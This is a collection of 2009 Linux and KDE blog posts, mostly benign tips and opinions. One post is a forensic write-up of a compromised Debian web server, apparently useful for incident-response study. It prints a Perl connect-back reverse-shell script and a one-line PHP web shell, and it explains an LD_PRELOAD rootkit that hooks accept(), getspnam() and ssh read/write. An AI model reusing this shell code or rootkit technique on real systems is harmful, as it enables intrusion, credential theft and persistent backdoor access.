Posts for Monday, August 24, 2009

Kmix Gets Support for OSSv4

Up until now, KDE 4 users have had to use OSSv4 own sound mixer (ossxmix) to change volumes levels while within KDE. Recently though preliminary support for OSSv4 has been built into kmix.


The Open Source Sound system is a sound system for *nix operating systems built on the original OSS format. A number of users have requested OSSv4 support in kmix for the last year. OSSv4 has now been added to the trunk of the kmix svn. I compiled kmix and tested it.

And it works pretty good.

I’ve built a PKGBUILD for Arch linux. If you’d like to compile it take a look at that for instructions.

What doesn’t work

  • Multimedia keys won’t be able to change volume and if you push them enough kmix magically disappears.
  • No support for adjusting program volumes levels.

Thanks for the KDE developer(s) work for helping get OSS back into KDE 4.


My OpenDesktop Competition Submission: Wipup

Folks from PlanetKDE last heard me announcing my journey along the path to become a KDE developer. There are many ways to do this and unfortunately the path that involves learning a load of C++ and start developing applications is still making slow but steady progress and not (yet) eligible for public announcement.

But – there are many ways to contribute!

I knew about the OpenDesktop Competition for quite a while now and originating from the area of webdevelopment I realised that my latest project ties almost perfectly with its goals. Obviously being very much related to KDE development and open-source in general I wanted to share it here:

Click here to check out my submission.

Obviously the main way to make this project become successful is through community support. I really think this can be integrated well such as through plasmoids or plugins on applications such as Krita or Dolphin.

Sorry for not really explaining what it’s about because it’s quite difficult to explain very quickly. But here is a crappy attempt: It allows users and developers to showcase the works in progress of their projects and keep in touch through them.


Of course, if you like the idea, I would love feedback and voting :)

Related posts:

  1. Hello Planet KDE!
  2. How do you use your desktop?
  3. The Road to KDE Devland (Moult Edition) #0

Posts for Saturday, August 22, 2009

Falcon Indent File

I will for the moment admit defeat. I guess it’s defeat. I didn’t honestly try that hard, then I got bored, so I quit. Call that what you want. I call it quitting. Anyway, I took the falcon indent file from their svn and uploaded it to Don’t worry I made it clear I did not write the file. I’m not out to steal other’s work, but on the same hand I see nothing wrong with spreading free software around to the right channels. The guy who wrote it (who’s name is still on top of the file) is more than welcome to continue updating it. Either way a syntax highlighting file and an indent file are now both on for your downloading pleasure.

Enjoy the Penguins!

Posts for Friday, August 21, 2009

TGJE no. 4 — Seeding is fun! :D

Recently I have got my old laptop back and therefore being back on my own box with my trusty media player, I can write again about free music.

Truth is, what is holding me back now is the three exams I have very soon and other obligations (e.g. to ELSA), so I do not have much time to listen to music, let alone comment on it this month.

What I can and will do today though, is to comment on my changed usage of Jamendo and free music in general. In my last TGJE report I complained about the lack of Ogg Vorbis seeds on Jamendo. Well, I decided (as I usually do) to help out the best an end user can — by seeding.

I started seeding every Jamendo album that I have on my disk.

This means I had to change my behaviour pattern with it comes to music quite a bit, but I think it's worth it if this means more people can download high quality free music via P2P!

What I did until now:

  1. I downloaded the album via KTorrent (my favourite bittorrent client) and when the share ratio hit 1.0 moved the album to my /music/ folder and therefore I could not seed it anymore;
  2. renamed the album folder to have a clean Artist — Album name;
  3. ran normalize on the album to normalise the volume levels between tracks

What I do now:

  1. I download the album still via KTorrent, but when the download finishes I use the move data option to move the album to my /music/ folder without the need to stop seeding. There is the downside that the album folders are less cleanly named, but it's a small price to pay.
  2. In Amarok2 I do not need to run the normalisation tool, because it already has a built-in reply gain, which is supperior to normalising tracks because a) it is automatic in the player b) does not recode the file and therefore does not lose quality and c) has more options.
  3. If/when I have to delete an album because I need more diskspace (not uncommon now that I lost my external HDD), I can safely delete it and know all my tags will still be there when I download it again, because of Amarok's new AFT.

So, with new technology in KDE it is actually less work to get a better result when listening and sharing free music. Kudos!

Of course there is always place for improvement, so here is my list of possible improvements:

  • For quite a long while I have been using categories in KTorrent to tell which albums I've already moved to my music folder/partition, but after thinking about it a bit, I figured out that it would be awesome if it was possible to automatically assign categories to torrents which are e.g. all from the Jamendo tracker and when the torrents in that category finish to download let KTorrent automatically move their data to a specific folder (and keep on seeding). [KDE brainstorm idea #76363]
  • There currently a bug in Amarok that produces a corrupt torrent file when you try to download an album via Amarok. Solving it would greatly improve its usability.
  • Slightly off topic, but while Amarok does have a native implementation of the Jamendo API, there is still a lot room for improvement — Jamendo has so many options that Amarok currently has not implemented (yet) [KDE brainstorm idea #50950]

So, there you have it — listening to free music and sharing it with others has never been as simple as now. I hope at least some of you follow suit and seed the free music you like as much as possible!

hook out >> making recycled tea and studying again ...boy, is it hot today!

m4a audio conversion in Linux

Today, an audio file was sent to me in an email.  This audio was compressed and encoded using the aac codec for compression and wrapped in m4a.  In order to use it, I had to convert this file to a wav format.  Usually, I receive files in mp3, ogg, or flac file types, and use lame, oggdec, or flac to decode them back to wav.  With m4a, I didn't quite know how to proceed.

In cases like this, I usually turn to sox, which has been able to handle just about everything I throw at it.  This time, it threw an error, telling me "sox formats: no handler for detected file type `audio/mp4'".  Although I knew this probably meant something like, "Hey, I know this file type, but I'm not compiled correctly to handle it!  Help!", I didn't find an easy answer...  So I started looking elsewhere.

I happened upon a wonderful plugin of audacious called "FileWriter" - which comes default in gentoo installations of audacious.

I right-clicked on the main window, went to Preferences ->Audio -> Current output plugin -> FileWriter Plugin

Then loaded the m4a file into audacious, and played it.  About 3 seconds later, I had a nice new wav file contrived from the m4a file through audacious.

So, I thought I'd just let ya'll know how to convert from m4a to just about anything you need.

There’s a rootkit in the closet!

Part 1: Finding the rootkit

It’s monday morning and I am for coffee in downtown Thessaloniki, a partner calls:
- On machine XXX mysqld is not starting since Saturday.
- Can I drink my coffee and come over later to check it ? Is it critical ?
- Nope, come over anytime you can…

Around 14:00 I go over to his company to check on the box. It’s a debian oldstable (etch) that runs apache2 with xoops CMS + zencart (version unknown), postfix, courier-imap(s)/pop3(s), bind9 and mysqld. You can call it a LAMP machine with a neglected CMS which is also running as a mailserver…

I log in as root, I do a ps ax and the first thing I notice is apache having more than 50 threads running. I shut apache2 down via /etc/init.d/apache2 stop. Then I start poking at mysqld. I can’t see it running on ps so I try starting it via the init.d script. Nothing…it hangs while trying to get it started. I suspect a failing disk so I use tune2fs -C 50 /dev/hda1 to force an e2fck on boot and I reboot the machine. The box starts booting, it checks the fs, no errors found, it continues and hangs at starting mysqld. I break out of the process and am back at login screen. I check the S.M.A.R.T. status of the disk via smartctl -a /dev/hda, all clear, no errors found. Then I try to start mysqld manually, it looks like it starts but when I try to connect to it via a mysql client I get no response. I try to move /var/lib/mysql/ files to another location and to re-init the mysql database. Trying to start mysqld after all that, still nothing.

Then I try to downgrade mysql to the previous version. Apt-get process tries to stop mysqld before it replaces it with the older version and it hangs, I try to break out of the process but it’s impossible…after a few killall -9 mysqld_safe;killall -9 mysql; killall -9 mysqladmin it finally moves on but when it tries to start the downgraded mysqld version it hangs once again. That’s totally weird…

I try to ldd /usr/sbin/mysqld and I notice a very strange library named /lib/ in the output. I had never heard of that library name before so I google. Nothing comes up. I check on another debian etch box I have for the output of ldd /usr/sbin/mysqld and no library /lib/ comes up. I am definitely watching something that it shouldn’t be there. And that’s a rootkit!

I ask some friends online but nobody has ever faced that library rootkit before. I try to find that file on the box but it’s nowhere to be seen inside /lib/…the rootkit hides itself pretty well. I can’t see it with ls /lib or echo /lib/*. The rootkit has probably patched the kernel functions that allow me to see it. Strangely though I was able to see it with ldd (more about the technical stuff on the second half of the post). I try to check on some other executables in /sbin with a for i in /usr/sbin/*;do ldd $i; done, all of them appear to have /lib/ as a library dependency. I try to reboot the box with another kernel than the one it’s currently using but I get strange errors that it can’t even find the hard disk.

I try to downgrade the “working” kernel in an attempt of booting the box cleanly without the rootkit. I first take backups of the kernel and initramfs which are about to be replaced of course. When apt-get procedure calls mkinitramfs in order to create the initramfs image I notice that there are errors saying that it can’t delete /tmp/mkinitramfs_UVWXYZ/lib/ file, so rm fails and that makes mkinitramfs fail as well.

I decide that I am doing more harm than good to the machine at the time and that I should first get an image of the disk before I fiddle any more with it. So I shut the box down. I set up a new box with most of the services that should be running (mail + dns), so I had the option to check on the disk with the rootkit on my own time.

Part 2: Technical analysis
I. First look at the library

A couple of days later I put the disk to my box and made an image of each partition using dd:
dd if=/dev/sdb1 of=/mnt/image/part1 bs=64k

Then I could mount the image using loop to play with it:
mount -o loop /mnt/image/part1 /mnt/part1

A simple ls of /mnt/part1/lib/ revealed that was there. I run strings to it:
# strings /lib/
Welcome master

As one can easily see there’s some sort of password hash inside and references to /usr/sbin/sshd, /bin/sh and setting HISTFILE to /dev/null.

I took the disk image to my friend argp to help me figure out what exactly the rootkit does and how it was planted to the box.

II. What the rootkit does

Initially, while casually discussing the incident, kargig and myself (argp) we thought that we had to do with a kernel rootkit. However, after carefully studying the disassembled dead listing of, it became clear that it was a shared library based rootkit. Specifically, the intruder created the /etc/ file on the system with just one entry; the path of where he saved the shared library, namely /lib/ This has the effect of preloading every single time a dynamically linked executable is run by a user. Using the well-known technique of dlsym(RTLD_NEXT, symbol), in which the run-time address of the symbol after the current library is returned to allow the creation of wrappers, the shared library trojans (or hijacks) several functions. Below is a list of some of the functions the shared library hijacks and brief explanations of what some of them do:

The hijacked accept() function sends a reverse, i.e. outgoing, shell to the IP address that initiated the incoming connection at port 80 only if the incoming IP address is a specific one. Afterwards it calls the original accept() system call. The hijacked getspnam() function sets the encrypted password entry of the shadow password structure (struct spwd->sp_pwdp) to a predefined hardcoded value (“$1$UFJBmQyU$u2ULoQTJbwDvVA70ocLUI0”). The hijacked read() and write() functions of the shared library wrap the corresponding system calls and if the current process is ssh (client or daemon), their buffers are appended to the file /var/opt/_so_cache/lc for outgoing ssh connections, or to /var/opt/_so_cache/ld for incoming ones (sshd). These files are also kept hidden using the same approach as described above.

III. How the rootkit was planted in the box

While argp was looking at the objdump output, I decided to take a look at the logs of the server. The first place I looked was the apache2 logs. Opening /mnt/part1/var/log/apache2/access.log.* didn’t provide any outcome at first sight, nothing really striking out, but when I opened /mnt/part1/var/log/apache2/error.log.1 I faced these entries at the bottom:

=> `foobar.ext’
Connecting to||:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 695 [text/plain]
foobar.ext: Permission denied

Cannot write to `foobar.ext’ (Permission denied).
=> `foobar.ext’
Connecting to||:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 695 [text/plain]

0K 100% 18.61 MB/s

01:05:51 (18.61 MB/s) – `foobar.ext’ saved [695/695]

=> `foobar.ext’
Connecting to||:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 695 [text/plain]
foobar.ext: Permission denied

Cannot write to `foobar.ext’ (Permission denied).
=> `foobar.ext’
Connecting to||:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 695 [text/plain]

0K 100% 25.30 MB/s

01:17:26 (25.30 MB/s) – `foobar.ext’ saved [695/695]

So this was the entrance point. Someone got through a web app to the box and was able to run code.
I downloaded “foobar.ext” from the same url and it was a perl script.

# Data Cha0s Perl Connect Back Backdoor Unpublished/Unreleased Source
# Code

use Socket;

print “[*] Dumping Arguments\n”;

$host = “A.B.C.D”;
$port = XYZ;

if ($ARGV[1]) {
$port = $ARGV[1];
print “[*] Connecting…\n”; $proto = getprotobyname(’tcp’) || die(”[-] Unknown Protocol\n”);

socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die (”[-] Socket Error\n”);

my $target = inet_aton($host);

if (!connect(SERVER, pack “SnA4×8″, 2, $port, $target)) {
die(”[-] Unable to Connect\n”);
print “[*] Spawning Shell\n”;

if (!fork( )) {
exec {’/bin/sh’} ‘-bash’ . “\0″ x 4;

Since I got the time when foobar.ext was downloaded I looked again at the apache2 access.log to see what was going on at the time.
Here are some entries:

A.B.C.D – - [15/Aug/2009:01:05:33 +0300] “GET HTTP/1.1″ 302 – “-” “Mozilla Firefox”
A.B.C.D – - [15/Aug/2009:01:05:34 +0300] “POST HTTP/1.1″ 200 303 “-” “Mozilla Firefox”
A.B.C.D – - [15/Aug/2009:01:05:34 +0300] “GET HTTP/1.1″ 200 131 “-” “Mozilla Firefox”
A.B.C.D – - [15/Aug/2009:01:05:38 +0300] “GET HTTP/1.1″ 200 – “-” “Mozilla Firefox”
A.B.C.D – - [15/Aug/2009:01:05:47 +0300] “GET HTTP/1.1″ 200 52 “-” “Mozilla Firefox”
A.B.C.D – - [15/Aug/2009:01:05:50 +0300] “GET HTTP/1.1″ 200 – “-” “Mozilla Firefox”
A.B.C.D – - [15/Aug/2009:01:05:51 +0300] “GET HTTP/1.1″ 200 59 “-” “Mozilla Firefox”

The second entry, with the POST looks pretty strange. I opened the admin/record_company.php file and discovered that it is part of zen-cart. The first result of googling for “zencart record_company” is this: Zen Cart ‘record_company.php’ Remote Code Execution Vulnerability. So that’s exactly how they were able to run code as the apache2 user.

Opening images/imagedisplay.php shows the following code:
<?php system($_SERVER["HTTP_SHELL"]); ?>
This code allows running commands using the account of the user running the apache2 server.

Part 3: Conclusion and food for thought
To conclude on what happened:
1) The attacker used the zencart vulnerability to create the imagedisplay.php file.
2) Using the imagedisplay.php file he was able to make the server download foobar.ext from his server.
3) Using the imagedisplay.php file he was able to run the server run foobar.ext which is a reverse shell. He could now connect to the machine.
4) Using some local exploit(s) he was probably able to become root.
5) Since he was root he uploaded/compiled and he created /etc/ Now every executable would first load this “trojaned” library which allows him backdoor access to the box and is hidding from the system. So there is his rootkit :)

Fortunately the rootkit had problems and if /var/opt/_so_cache/ directory was not manually created it couldn’t write the lc and ld files inside it. If you created the _so_cache dir then it started logging.

If there are any more discoveries about the rootkit they will be posted in a new post. If someone else wants to analyze the rootkit I would be more than happy if he/she put a link to the analysis as a comment on this blog.

Part 4: Files

In the following tar.gz you will find the library and the perl script foobar.ext (Use at your own risk. Attacker’s host/ip have been removed from the perl script):linuxv-rootkit.tar.gz

Many many thanks to argp of Census Labs

A Better Link

I started on this thinking this would be an easy task. See, I can never remember the order I have to do a link (ln -s file/folder location-to), so I decided to build a script that would give me usage and display the link once it’s been made. This turned out to be a pretty good task as: ‘ln’ needs a path if trying to link a file in the current directory, getting a full path isn’t readily available and considering names that have spaces in them.

Anyways, enough of the chatter. Here’s ‘lnk’. It will display usage if no arguments are given, display the link when done, and check to see if the name already exists.

You’ll need likely to install ‘realpath‘ as it isn’t installed on most distributions by default.

#!/bin/bash # lnk - link files/folders without broken links and feedback # Author: Gen2ly # Text color variables TXTBLD=$(tput bold)     # Bold TXTUND=$(tput sgr 0 1)  # Underline TXTRED=$(tput setaf 1)  # Red TXTGRN=$(tput setaf 2)  # Green TXTYLW=$(tput setaf 3)  # Yellow TXTBLU=$(tput setaf 4)  # Blue TXTPUR=$(tput setaf 5)  # Purple TXTCYN=$(tput setaf 6)  # Cyan TXTWHT=$(tput setaf 7)  # White TXTRST=$(tput sgr0)     # Reset # Display usage if full argument if isn't given. if [[ -z "$2" ]]; then   echo " lnk <file-or-folder> <link-to-location>"   exit fi # Check if file or folder exists if [[ ! -f $1 ]] && [[ ! -d $1 ]]; then   echo " File/folder does not exist"   exit fi # Variables to check if link points to a folder or to a new link LINKDIR=${2%/}/${1##*/} LINKNEW=$2 # Check if the link name matches another link if [[ -L $LINKDIR ]] || [[ -L $LINKNEW ]]; then   echo " Link already exists:"   if [[ -L $LINKDIR ]]; then     echo " $(ls -la --color=always $LINKDIR | awk '{printf $8" "$9" "$10}')"   fi   if [[ -L $LINKNEW ]]; then     echo " $(ls -la --color=always $LINKNEW | awk '{printf $8" "$9" "$10}')"   fi   exit fi # Check if link name matches a file name if [[ -f $LINKDIR ]] || [[ -f $LINKNEW ]]; then     echo " File already exists with that name:"   if [[ -f $LINKDIR ]]; then     echo " $(ls -la --color=always $LINKDIR | awk '{printf $1" "$8}')"   fi   if [[ -f $LINKNEW ]]; then     echo " $(ls -la --color=always $LINKNEW | awk '{printf $1" "$8}')"   fi   exit fi # Create symbolic link #'ln' needs path argument for linking a file in the current directory # realpath extracts '\'s before spaces FPATH=`realpath "$1" | sed -e 's: :\\ :g'` ln -s "$FPATH" $2 # Display colors for full file path, link same path, link new path FPATHDIS=${TXTBLD}${TXTGRN}$FPATH${TXTRST} LINKDIRDIS="${TXTBLD}${TXTCYN}$(realpath -s "$LINKDIR")${TXTRST}" LINKNEWDIS="${TXTBLD}${TXTCYN}$(realpath -s $LINKNEW)${TXTRST}" # Display linked file if [[ -L $LINKDIR ]]; then   echo " $FPATHDIS -> $LINKDIRDIS" fi if [[ -L $LINKNEW ]]; then   echo " $FPATHDIS -> $LINKNEWDIS" fi # Limitations # because lnk must check if the link points to a folder or a new linkname # if creating a link of a file that has the same name as a directory # and the link has the same name as a link in that directory, lnk will # fail from a link check

You’re putting your mum on Gentoo? You’re mad.

This is the second time I’m putting Gentoo on my mum’s computer. The first time was a good year or so ago – however my own old laptop got a hardware failure soon after and so I *ahem* took her computer. (I’m innocent I swear!) She’s decently computer illiterate and has always wanted to learn. She recently got a new laptop, an Acer Aspire 4535 (it comes without Windows pre-installed).

Had to install it using the SystemRescueCD as Gentoo’s minimal install didn’t have the module for my NIC. Xorg is compiling, the holidays are almost over, and it’s time to overload my schedule again.

To make this a bit more computer-relevant, I ask you: what do you suggest I do to help make it “easier” to use for someone like my mum? I am planning a cron-scheduled usual sync, update, revdep-rebuild. I don’t think I can automate the etc-update but that could pretty easy to train I think. Kernel updates is going to be a hassle. She wants KDE and so that means unstable packages.

Sounds fun.

Related posts:

  1. Gentoo installed (again).
  2. Gentoo, build it like Lego.

Posts for Thursday, August 20, 2009


How did I live this long without knowing about searchpairpos() in Vim? I hate when I write a clumsy, slow reimplementation of something that already exists as a standard function.

The only bad thing about Vim and Emacs both is that the feature list is about a mile and a half long (and that's a bad thing only in the sense of being an overwhelming amount of good things).

I have read almost the entire Vim manual at this point but there are corners that remain unexplored, and sometimes they contain treasure. One thing I love doing is answering Vim questions on Stack Overflow because most of the time I don't know the answer right off the bat, and so looking it up or figuring it out teaches me something new.

Emacs is another story... Emacs remains a mystery to me in many ways, in spite of having used it for about a year now. I very much plan to read the whole Emacs manual. I've already read parts of it but I seem to have barely made a dent. There are things I know should be simple to do or that there are already built-in options for, but I don't know how to do them.

  • How do I kill a word and also kill the whitespace immediately after it so it yanks properly later?
  • When I kill-whole-line and paste that line elesewhere, I lose a newline and screw up indenting. Sometimes it works how I expect and sometimes it doesn't.
  • There are so many things I can do in Vim but can't in Emacs... marks, multiple registers, abbreviations, sensibly configured per-filetype indentation.

etc. etc. I know there are ways to do these things once I have time to just sit down and read the darned manual. And learn elisp's syntax and semantics (which can't be harder than learning Vim script). My ~/.vimrc is currently twice as long as my ~/.emacs, which says a lot.

On a related note, I'm in the process of putting my Vim and Emacs configs on github.

Read "Little Brother"

The title of this post can be either read as a statement or a command, and initially I wanted to write a lenghtly sloopy post about how some books change your life or just mean a lot to someone etc. etc. etc. ...but I won't!!

It is a command.

Read it!

If you know me, you know that I don't make recomendations lightly and that I have a very good reason to do so now. (Yes, it was the first book in years that made my heart pound wildly and I didn't want to part with it...)

If you don't know me or just don't care what I think or don't want to follow what I say, read it anyway! XD

I won't tell you why, just do it! Now!!!

Bloody download the bloomin' book and read it!!!

hook out >> read it, enjoyed it, have to study now

P.S. Cory Doctorow, you are an evil evil man to have written such a brilliant book. If I fail these exams, I am sooooo totally blaming your evil genius for making me procrastinate!!! XD

"What's in a name? That which we call a rose / By any other name would smell as sweet."

The quote that forms the heading for this post is from William Shakespeare's play "Romeo and Juliet", this post is about names.

Today _why died. But _why is not a real person, he is the virtual personality of someone. That someone decided to delete _why's Twitter account, his websites and similar things for unclear reasons (and those reasons are not actually the topic here either). _why's "death" created quite a lot of fuss in the Ruby community where _why was … well not a star, more like a saint actually ;-).

If I would describe this to my dad he'd call those guys nuts: _why is not a "real person" and _why was not his "real name", so why talk about it? What's it with those "nicknames" anyways?

A few days ago I wrote about our authorship fetish and how some people can't deal with the fact that the "brilliant creator" doesn't exist anymore (and never really has) because we just merge all our influences and communication to "create". The fetish for the "author" is only outmatched by our fetish for names.

When we are born a name is given to us, we even call it our "given name". The rest of our name is inherited from our parents: We have no choice and we are not asked. But all our life we are forced to use that name, everywhere. When I want to publish "serious" work I have to put my "real name" on it. When I order something online, I have to give my "real name". Many have gotten used to people that "live online" having "aliases" just as we allow "artists" to have stage names. But those are not "real" in our minds. They are just "made up" and therefore are just toys.

In older times people used to use "invented" names because they thought that if someone knew your real name that person had "power" over you, could cast magic spells on you. Today probably only very few people still believe in that direct relation but the way we see "real names" still hasn't changed: If tomorrow I would ask everybody to call me "WASD" or "1234" or "Peter" I'd be looked at like I was a mad man (even more than usual). I can change my "official" name for a lot of money (and only if I have a very serious reason and can convince some bureaucrat to agree that I should be allowed to change my name. And even then I cannot really chose freely, I have to choose something "appropriate", something that looks like a "real name").

Online I usually use the handle "tante" (if it's not already taken which happens more often than I like ;-)) and there's a bunch of people who either only know me by that name or who would never call me something else even if they know my real name. If you want to get my attention in real life your chances are best if you yell out "tante" and not "Jürgen" or "Mr. Geuter". "tante" is my name. I picked it, it was not chosen for me, so why should it be any less "real" than the name my parents picked for me? And why shouldn't I be allowed to drop it any time I want and chose another one?

Names don't have mystical powers, they're just handles. As any government official will tell you, they're not even very good identifiers, cause we have so many name collisions. Which is why official databases use something else as identifier. So if names are no longer identifiers (a function they might have had in the past) why should we force people to stick to the name they didn't even chose for themselves? We don't force people to stick to the religion that their parents might have chosen for them by having them christened as babies. Why with names?

Yeah it might be a pain in the ass to learn a new name if someone you've known for a long while changes his/her handle, but in this case, it's not about you.

Names are like fashion. A chosen name says something about the person that chose it. Maybe it just says something about what that person likes soundwise. Maybe it says more. But we'd never say that some man isn't allowed to wear a skirt if he wants to, so why shouldn't I be allowed to change my "real name" to "f(x)=Π*6/x"?

I propose the following new rule: Everybody can always change his/her name. There's a fee to cover the actual costs (like changing passports and stuff) but that's it. If you wanna be called "Poopy the dogmaster" so be it.

Shoes 2 packaged for Ubuntu: My first package

So you may have noticed a few days ago a link to an article on teaching to program in a newish language called Shoes. Its a cute language on top of Ruby for whipping up fun cute little GUI apps, event oriented and good for introductions to programming. So I wanted to play with it but Ubuntu and Debian ship the old version 1 and version 2 has been out since December 2008. So I checked Ubuntu's bugzilla and sure enough, there was a bug from April asking for a version bump with no response. So I figured it might be time to step up to the plate. So I brought up the Ubuntu Packaging Guide and gave it a read. Turns out Shoes wasn't trivial to package but with the old version 1 Deb package as a starting point I was able to get version 2 packaged! It's now sitting in Ubuntu's bugzilla at and if you just want the Shoes 2 i386 deb, its at So yeah, check it out, give it a whirl, have fun.

As a side note, I've found Ubuntu's bugzilla to be sporadically responsive which sucks a bit, but does encourage one to step up some... But looking at Debian, where this package actually originated from is even worse. They have no web interface for entering bugs, they only accept them via email or a command line tool. It does seems like a epic usability fail. So here's hoping that now that Shoes 2 has been packaged as a .deb we'll see it in Ubuntu sooner rather than later. Maybe I should just make a new bug for it?

(I hate to say it, but I still have found the Gentoo bugzilla to be blazingly responsive and have fond memories of it. I wish other communities could learn from it, what ever it is they are doing right.)

GitHub Linking part 2

This is more involved explanation of Part 1:

The basics of what’s going on here is pretty simple. Take our original link:

The first couple of parts is pretty simple

GitHub’s URL:

Followed by the user:

… the repo name:

… the type (This is basically what you’re looking at. If you’re looking at the repository itself it’ll say “tree”):

… the jibberish:

If you look real close as “the jibberish” you’ll notice it’s simply the commit number. The problem then stems if you want to link to the latest version you obviously don’t want to link to an individual commit. If you do then if you ever update you’ll have to update your link too! So instead we replace the commit key with “master” which instructs it to goto the latest version.

and finally the file:

I hope that helped!

Enjoy the Penguins!

How to link to GitHub

You’re probably thinking this is going to be the most retarded post ever because anyone can copy and paste out of the address bar in Firefox, but after a little experimentation I’ve discovered it’s not quite that easy.

I’ll use my own github site’s URL as an example. So for example, if you wanted to see my filetype.vim because you need to know how to make vim recognize those crazy .fal files for your falcon code. So you goto my github site and you find it so you can send it to your friends to because your gracious and actually credit me with showing you how. So you copy and paste the following link:

Well, not only is that hideous and impossible to remember but your not even sure it’ll work for them and you like to show off like the pimp you really are. Well, if you take the above link remove the jibberish in the middle:


and replace it with:


so that you final link looks like:

You can now easily link to any file you want from anyone’s github website.

Enjoy the Penguins!

Posts for Wednesday, August 19, 2009

Falcon Vim Syntax Update

I have been testing my vim syntax file for falcon since I posted about it and I have corrected a lot of issues with it. It now highlights single line comments. And it also no recognizes the preprocessor statement at the top of the script. So if you’re programming in falcon using vim I suggest you download my update. There other minor fixes to but they’re not really worth mentioning. Finally, I posted my falcon syntax file on Vim’s website so you can find in the official vim repositories though I can’t promise I’m going to update it there every time so I recommend you check github if you want a copy.

I’m working on creating an indent file for falcon as well. Indent files are more complicated though so it’s taking me longer to hash one out. In the mean time though I believe they do have one on the falcon svn though I do not have a link for it. I’ll post again once I get one worth publishing.

Enjoy the Penguins!


Fixing image distortion on websites using Firefox/Iceweasel 3.5 on Debian testing with intel xorg driver

Lately I noticed some image distortion appearing on some websites using my laptop with Debian squeeze. Menus on swiftfox did not appear as they should, some logos appeared out of their place and there were artifacts and other annoying things. For example Planet Gnome looked like this:
When using iceweasel 3.0.12 everything looked fine. Then I followed a guide to install Iceweasel 3.5 from experimental to my system. Images looked distorted again. So there must have been a problem with the latest xulrunner….

After some googling I bumped into Debian bug #491871 – [965GM EXA] display corruption with xulrunner 1.9. Following post #67 on that thread I was able to repair my xorg.conf to something that fixed the image distortion. Now Planet Gnome looks like this:

Some info:

# apt-cache policy iceweasel xserver-xorg-video-intel xulrunner-1.9.1
Installed: 3.5.1-1
Candidate: 3.5.1-1
Version table:
*** 3.5.1-1 0
1 experimental/main Packages
100 /var/lib/dpkg/status
3.0.12-1 0
500 squeeze/main Packages
99 sid/main Packages
Installed: 2:2.3.2-2+lenny6
Candidate: 2:2.3.2-2+lenny6
Version table:
2:2.8.0-2 0
99 sid/main Packages
*** 2:2.3.2-2+lenny6 0
500 squeeze/main Packages
100 /var/lib/dpkg/status
Version table:
*** 0
1 experimental/main Packages
100 /var/lib/dpkg/status

Posts for Tuesday, August 18, 2009

Touchscreens suck

Touchscreens are all the rage: Most modern smartphones use them, surf-tablets or other appliances integrate them. They allow the developer (and sometimes the user) to customize the interface a lot more than what they are used to: Buttons are not mapped to actual buttons on a keyboard anymore so you can change their design or size any given time allowing really pretty interfaces. We even start to integrate touchscreens that can register more than one contact (so-called "multitouch") to trigger actions with certain complex hand gestures. Touchscreens are so neat. And they suck so bad.

Let me elaborate. We as human beings come with a set of features and limitations as well as a few basic principles that are hardwired into our brains. We do for example know that when we grab something we have to close our hand around it. That idea has found its way into our language, too: "grasp" for example means to actually grab a physical object as well as understanding something (as in grabbing it with you mind), the same phenomenon can be found in German ("begreifen") and Latin ("capere"), it seems to be a correlation that comes to us quite "naturally".

Now let us apply that idea to touchscreens. When I want to move an object in the real world, I grab it, I move my hand and I let the object go. With a conventional mouse I click (which is a movement similar to closing the hand if you look at it), I hold the button (I keep the hand closed), I move my hand and then I release the button (I "open my hand"). The way the mouse works is very similar to how the real-world process works. On a touchscreen I just point at the thing I want to move. I don't grab it, I don't even have to touch it "harder" or anything, I just touch. Then I move the finger and move the finger away from the screen. That is not natural at all.

Let's look at another thing: Typing. At home I use a Lenovo Thinkpad. I bought it for a bunch of reasons but one main reason was that the keyboard is awesome: The buttons have a really good feeling, I am never unsure whether a keypress registered or not. The resistance of the keys is pretty brilliant. And it makes sense because we have learned how buttons work since we were little children: You press the thingy, you hear a "click" or feel it and now you know that an action will happen (or if it doesn't you know that something is broken). If your button has no such haptic response people will be confused and check whether the button really worked all the time. Welcome to touchscreen land: Pressing a button either gives you no haptic feedback (it makes no difference whether you hit the button or the area next to it) or the device starts doing something weird (like vibrating for example, seriously, if my buttons at home would vibrate when I push them I'd go nuts). The reaction of the button to the activation is completely counterintuitive (especially considering that the screen usually still shows me that I "pushed the button down" when I obviously didn't. Typing on touchscreen interfaces kinda works for short texts but not for real typing due to the lack of feedback which leads to your brain being irritated and making you hit the surface harder than it has to. The resistance that real keys have is also a buffer that helps the brain to act properly.

Well now we have looked at two aspects and maybe you consider both of them invalid rendering my whole rant moot. Good thing that I kept an ace up my sleeve, the absolute killer argument for why touchscreens suck.

I don't know your hands, but here's one of mine. As you can see, I have rather slim fingers. I'm just saying that cause it is somewhat relevant to the next complaint: Touchscreens suck cause you have your bloody fingers in that area where the content you are trying to read is, covering it. I don't know who thought it was a good idea but it is the main complaint against touchscreens. Screen real estade is precious, especially on mobile devices where the amount of pixels is quite limited. Why would I now put my hand over the small area where the stuff I wanna see is? I don't know about you but my hand is quite opaque.

Touchscreens look nice and allow some real eye-candy but from a usuability standpoint and from a common sense standpoint they are completely retarded. And that, my friends and readers, is why touchscreens suck.

Now let's see if someone can bring some good arguments for touchscreens, post them into the comments.

ATH-AD700 Review

Recently I got my ATH-AD700 headphones. I've been FAR more excited than anyone has a right to be, waiting for these things to show up, like Christmas in August. Sweet, sweet anticipation. It was well worth the wait.

The only other headphones I have to compare these with are my Grado SR80's (which have really seen better days) and some Shure "noise-cancelling" earbuds which are nice but are not comparable to either. So I'll compare the AD700 to the SR80's. ATH-AD700's are pictured left, Grado SR80's are right.

Headphones Headphones

(Note: Nowhere in this article shall I refer to anything as "cans". I reserve the right to retain some level of self-righteous, snobbish disdain for the audiophile community.)

ATH-AD700 in two words: Freaking Huge.

One cannot understate how enormous the AD700's are. I thought the SR80's were big but the AD700's make me feel like a toddler. They literally engulf your face like the hand of a giant. If you have a tiny head you might have problems even keeping them on your head.

These are the kind of headphone that completely surround your ear rather than sit on your ear. With the AD700's I could probably fit 2 or 3 more ears into the cups along with mine.

There is no way you will wear these and not look completely ridiculous to those around you.

And yet, freaking comfortable.

In spite of their size, the AD700's are very light. They seem to be made of some kind of thin plastic with aluminum grated sides and a few metal finishing bits. They barely feel like anything when you put them on. I've worn them for many hours without discomfort.

